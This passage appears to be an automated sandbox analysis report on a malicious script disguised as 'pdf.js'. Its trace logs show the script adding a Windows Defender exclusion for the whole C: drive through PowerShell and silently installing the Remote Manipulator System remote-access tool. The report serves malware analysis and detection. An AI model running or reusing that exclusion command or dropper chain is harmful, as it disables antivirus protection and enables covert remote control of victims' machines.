o:%22goog.net%22 f:substr a0:0 a1:4");ITextStream.WriteLine(" exit:263630 o:%22goog.net%22 f:substr r:%22goog%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog%22 f:lastIndexOf r:-1");ITextStream.WriteLine(" entry:263630 o:%22goog%22 f:substr a0:0 a1:-1");ITextStream.WriteLine(" exit:263630 o:%22goog%22 f:substr r:%22%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263763 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exit:268445 o:%5Bobject%20Object%5D f:getLogger r:%5Bobject%20Object%5D");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:true");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:true");ITextStream.WriteLine(" entry:270419 f:OHLHDFAUNYRYPBJOP");ITextStream.WriteLine(" exec:270624 f:OHLHDFAUNYRYPBJOP");IWshShell3._00000000();ITextStream.WriteLine(" entry:270638 o: f:Run a0:%22powershell.exe%20-Command%20%22Add-MpPreference%20-ExclusionPath%20'C%3A%5C'%22%22 a1:0 a2:true");IWshShell3.Run("powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"", "0", "true");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog.net%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog.net%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog.net%22 f:lastIndexOf r:4");ITextStream.WriteLine(" entry:263630 o:%22goog.net%22 f:substr a0:0 a1:4");ITextStream.WriteLine(" exit:263630 o:%22goog.net%22 f:substr r:%22goog%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog%22 f:lastIndexOf r:-1");ITextStream.WriteLine(" entry:263630 o:%22goog%22 f:substr a0:0 a1:-1");ITextStream.WriteLine(" exit:263630 o:%22goog%22 f:substr r:%22%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263763 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exit:268445 o:%5Bobject%20Object%5D f:getLogger r:%5Bobject%20Object%5D");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:true");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:true");ITextStream.WriteLine(" entry:270419 f:OHLHDFAUNYRYPBJOP");ITextStream.WriteLine(" exec:270624 f:OHLHDFAUNYRYPBJOP");IWshShell3._00000000();ITextStream.WriteLine(" entry:270638 o: f:Run a0:%22powershell.exe%20-Command%20%22Add-MpPreference%20-ExclusionPath%20'C%3A%5C'%22%22 a1:0 a2:true");IWshShell3.Run("powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"", "0", "true");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog.net%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog.net%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog.net%22 f:lastIndexOf r:4");ITextStream.WriteLine(" entry:263630 o:%22goog.net%22 f:substr a0:0 a1:4");ITextStream.WriteLine(" exit:263630 o:%22goog.net%22 f:substr r:%22goog%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog%22 f:lastIndexOf r:-1");ITextStream.WriteLine(" entry:263630 o:%22goog%22 f:substr a0:0 a1:-1");ITextStream.WriteLine(" exit:263630 o:%22goog%22 f:substr r:%22%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263763 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exit:268445 o:%5Bobject%20Object%5D f:getLogger r:%5Bobject%20Object%5D");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register
          Source: eventmsg.dll.34.drStatic PE information: section name: .didata
          Source: webmvorbisencoder.dll.34.drStatic PE information: section name: _RDATA
          Source: vp8encoder.dll.34.drStatic PE information: section name: .rodata
          Source: vp8decoder.dll.34.drStatic PE information: section name: .rodata
          Source: webmvorbisdecoder.dll.34.drStatic PE information: section name: _RDATA
          Source: libasset32.dll.34.drStatic PE information: section name: /4
          Source: libasset32.dll.34.drStatic PE information: section name: /14
          Source: libasset32.dll.34.drStatic PE information: section name: /29
          Source: libasset32.dll.34.drStatic PE information: section name: /41
          Source: libasset32.dll.34.drStatic PE information: section name: /55
          Source: libasset32.dll.34.drStatic PE information: section name: /67
          Source: libasset32.dll.34.drStatic PE information: section name: /78
          Source: libasset32.dll.34.drStatic PE information: section name: /94
          Source: libasset32.dll.34.drStatic PE information: section name: /110
          Source: libcodec32.dll.34.drStatic PE information: section name: .rodata
          Source: libcodec32.dll.34.drStatic PE information: section name: /4
          Source: libcodec32.dll.34.drStatic PE information: section name: /14
          Source: libcodec32.dll.34.drStatic PE information: section name: /29
          Source: libcodec32.dll.34.drStatic PE information: section name: /41
          Source: libcodec32.dll.34.drStatic PE information: section name: /55
          Source: libcodec32.dll.34.drStatic PE information: section name: /67
          Source: libcodec32.dll.34.drStatic PE information: section name: /78
          Source: libcodec32.dll.34.drStatic PE information: section name: /94
          Source: libcodec32.dll.34.drStatic PE information: section name: /110
          Source: vccorlib120.dll.34.drStatic PE information: section name: minATL
          Source: rutserv.exe.34.drStatic PE information: section name: .didata
          Source: rfusclient.exe.34.drStatic PE information: section name: .didata
          Source: vccorlib120.dll0.34.drStatic PE information: section name: minATL
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B377E30 push eax; mov dword ptr [esp], esi39_2_6B377ED1
          Source: msvcr120.dll.34.drStatic PE information: section name: .text entropy: 6.95576372950548
          Source: VPDAgent.exe.34.drStatic PE information: section name: .text entropy: 6.812931691200469
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\VPDAgent.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcr120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\emf2pdf.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdpm.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcr120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdui.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\libasset32.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\vccorlib120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI44FB.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpd_sdk.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\vccorlib120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\progressbar.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdpm.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\fwproc.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\MessageBox.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\libcodec32.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcp120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\eventmsg.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\properties.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpdisp.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\pdfout.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcp120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\srvinst.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdui.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI44FB.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exeJump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\ProgramData\Remote Manipulator System\install.log
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\licenses.txt
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Uses an obfuscated file name to hide its real file extension (double extension)
          Source: Possible double extension: pdf.jsStatic PE information: U0443.pdf.js
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
          Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\RMS Host Installer Security
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
